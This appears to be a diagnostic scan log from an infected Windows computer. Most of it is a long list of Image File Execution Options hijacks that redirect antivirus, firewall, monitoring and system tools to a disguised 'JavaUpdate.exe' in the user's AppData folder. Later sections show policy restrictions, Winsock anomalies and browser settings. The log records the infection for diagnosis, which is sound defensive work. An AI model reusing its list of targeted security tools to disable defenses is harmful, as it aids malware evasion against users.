IFEO\licwiz.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Lite.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\LittleHook.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\livehelp.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\lookout.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\lpfw.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\mbam.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\mbamscheduler.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\mbamservice.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\mcods.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\MCS-Uninstall.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\MCShieldCCC.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\MCShieldDS.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\MCShieldRTM.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\mcvsescn.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\mergecap.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\MpCmdRun.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\mpf.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\mpfcm.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\MpUXSrv.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\MSASCui.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\msconfig.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\MsMpEng.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\msseces.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\MWAGENT.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\MWASER.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nanoav.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nanosvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\navapsvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nbrowser.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Netcap.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Netguard: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\netguardlite.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Netmon.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nfservice.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\njeeves2.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nnf.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nod32.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nod32krn.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nprosec.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\NS.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nseupdatesvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nstzerospywarelite.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nvcod.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nvcsvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nvoy.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nwscmon.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\oasclnt.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\omnitray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\OnAccessInstaller.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ONLINENT.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\opf.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\opfsvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\OPSSVC.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\op_mon.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\outpost.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Packetizer.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Packetyzer.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\pcipprev.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\pctav.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\pctavsvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\pcviper.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\persfw.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\pfft.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\pgaccount.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\prevxcsi.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\prifw.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\privatefirewall: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\privatefirewall3.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ProcessHacker.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\procexp.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\procguard.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\procmon.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\protect.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\PSANHost.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\PSUAMain.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\PSUAService.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\PtSessionAgent.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\PtSvcHost.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\PtWatchDog.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\pxagent.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\QUHLPSVC.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\rawshark.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\RDTask.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\regedit.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\rtt_crc_service.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sab_wab.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sagui.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SAPISSVC.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SASCore64.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SASTask.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\savadminservice.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\savcleanup.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\savcli.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\savmain.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\savprogress.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\savservice.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SBAMSvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SBAMTray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SBPIMSvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SCANNER.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SCANWSCS.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\scfmanager.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\scfservice.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\schedulerdaemon.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\scproxysrv.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ScSecSvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sdcdevcon.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sdcdevconIA.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sdcdevconx.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sdcservice.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SDFSSvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SDScan.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SDTray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sdtrayapp.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SDWelcome.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\siteadv.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sndsrvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Sniffer.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\snsmcon.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\snsupd.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SoftAct.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\spfirewallsvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sppfw.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\spybotsd.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SpyHunter3.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\spywareterminatorshield.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\spywat~1.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sp_rsser.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ssupdate.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SSUpdate64.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SUPERAntiSpyware.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SUPERDelete.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Taskmgr.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Tcpdump.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\terminet.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Tethereal.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\text2pcap.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\THGuard.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\tppfdmn.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\TRAYICOS.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\TRAYSSER.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\trigger.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\tscutynt.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\tshark.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\tzpfw.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\uiSeAgnt.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\uiUpdateTray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\uiWatchDog.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\uiWinMgr.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\umxagent.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\umxtray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\UnThreat.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\updclient.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\UserAccountControlSettings.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\utsvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\UUpd.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\uwcdsvr.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\V3Main.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\V3Medic.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\V3Proxy.ahn: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\V3SP.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\V3Svc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\V3Up.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\VCATCH.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\vdtask.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\VIEWTCP.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\VIPREUI.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\virusutilities.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\VSDesktop.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\WebCompanion.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\webwall.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Windump.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\winroute.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\wireshark.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\wwasher.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\xauth_service.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\xfilter.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Zanda.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\zerospywarele.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\zerospywarelite_installer.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Zlh.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\zlhh.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
BootExecute: autocheck autochk * bootdelete
GroupPolicy: Restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Winsock: Catalog5 03 C:\Windows\SysWOW64\mswsock.dll [231424 2016-05-11] (Microsoft Corporation) ATTENTION: LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"
Winsock: Catalog5 04 %SystemRoot%\System32\nwprovau.dll No File
Winsock: Catalog5-x64 01 C:\Windows\System32\mswsock.dll [327168 2016-05-11] (Microsoft Corporation) ATTENTION: LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 75.75.75.75 75.75.76.76
Tcpip\..\Interfaces\{0D6C597F-BEA6-4C5F-B16E-5D8A77442F57}: [DhcpNameServer] 75.75.75.75 75.75.76.76
Tcpip\..\Interfaces\{1EF46E09-C75C-4B5D-87E6-60F8E9B8AC96}: [DhcpNameServer] 75.75.75.75 75.75.76.76
Tcpip\..\Interfaces\{5F5D0476-C352-4839-8C17-C65B27F8B0FF}: [DhcpNameServer] 75.75.75.75 75.75.76.76

Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
SearchScopes: HKU\S-1-5-21-1764878690-1872824068-2637823629-1001 -> DefaultScope {7B00843A-8871-4C08-BC28-96ABB84D43E4} URL = hxxp://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}&ie={inputEncoding}&oe={outputEncoding}&startIndex={startIndex?}&startPage={startPage}&rlz=
SearchScopes: HKU\S-1-5-21-1764878690-1872824068-2637823629-1001 -> {7B00843A-8871-4C08-BC28-96ABB84D43E4} URL = hxxp://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}&ie={inputEncoding}&oe={outputEncoding}&startIndex={startIndex?}&startPage={startPage}&rlz=
BHO: No Name -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> No File
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corp.)
BHO: No Name -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> No File
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_91\bin\ssv.dll [2016-04-27] (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corp.)
BHO-x32: Adobe PDF Conversion Toolbar Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2015-04-29] (Adobe Systems Incorporated)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_91\bin\jp2ssv.dll [2016-04-27] (Oracle Corporation)
BHO-x32: SmartSelect Class -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2015-04-29] (Adobe Systems Incorporated)
Toolbar: HKLM-x32 - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2015-04-29] (Adobe Systems Incorporated)
Toolbar: HKU\S-1-5-21-1764878690-1872824068-2637823629-1001 -> No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
DPF: HKLM-x32 {233C1507-6A77-46A4-9443-F871F945D258} hxxp://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab

FireFox:
========
FF ProfilePath: C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default [2016-10-19]
FF user.js: detected! => C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\user.js [2016-09-16]
FF DefaultSearchEngine: Mozilla\Firefox\Profiles\0qifstuh.default -> Google
FF DefaultSearchEngine.US: Mozilla\Firefox\Profiles\0qifstuh.default -> Google
FF Homepage: Mozilla\Firefox\Profiles\0qifstuh.default -> hxxp://www.gbatemp.net
FF NetworkProxy: Mozilla\Firefox\Profiles\0qifstuh.default -> type", 0
FF Extension: (about:addons-memory 2016) - C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\Extensions\about-addons-memory@sturdiguns.org.xpi [2016-05-02]
FF Extension: (Classic Theme Restorer) - C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\Extensions\ClassicThemeRestorer@ArisT2Noia4dev.xpi [2016-10-15]
FF Extension: (Gmail™ Notifier (restartless)) - C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\Extensions\jid0-GjwrPchS3Ugt7xydvqVK4DQk8Ls@jetpack.xpi [2016-10-14]
FF Extension: (Hide Fedora) - C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\Extensions\jid1-tg9TKUYM47PZpg@jetpack.xpi [2016-03-30]
FF Extension: (Broadband Speed Test and Diagnostics) - C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\Extensions\speedtest@gotomyhelp(2).com [2009-10-15] [not signed]
FF Extension: (No Name) - C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\Extensions\temp [2009-10-15] [not signed]
FF Extension: (VideoDownloader) - C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\Extensions\videodowloader@videodownloader(2).net [2009-10-15] [not signed]
FF Extension: (IE Tab 2 (FF 3.6+)) - C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\Extensions\{1BC9BA34-1EED-42ca-A505-6D2F1A935BBB} [2016-02-19]
FF Extension: (Forecastfox Enhanced) - C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\Extensions\{3CE993BF-A3D9-4fd2-B3B6-768CBBC337F8}(2) [2009-10-15] [not signed]
FF Extension: (Download YouTube Videos as MP4) - C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\Extensions\{b9bfaf1c-a63f-47cd-8b9a-29526ced9060}.xpi [2016-09-03]
FF Extension: (Video DownloadHelper) - C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2016-10-11]
FF Extension: (Adblock Plus) - C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2016-04-28]
FF SearchPlugin: C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\searchplugins\piratebay.xml [2008-05-29]
FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension@web2pdf.adobedotcom] - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn
FF Extension: (Adobe Acrobat - Create PDF) - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn [2015-06-13] [not signed]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_21_0_0_242.dll [2016-06-15] ()
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.50709.0\npctrl.dll [2016-07-11] ( Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [2012-09-20] (Adobe Systems)
FF Plugin: adobe.com/AdobeExManDetect -> C:\Program Files (x86)\Adobe\Adobe Extension Manager CS6\npAdobeExManDetectX64.dll [2012-10-22] (Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_21_0_0_242.dll [2016-06-15] ()
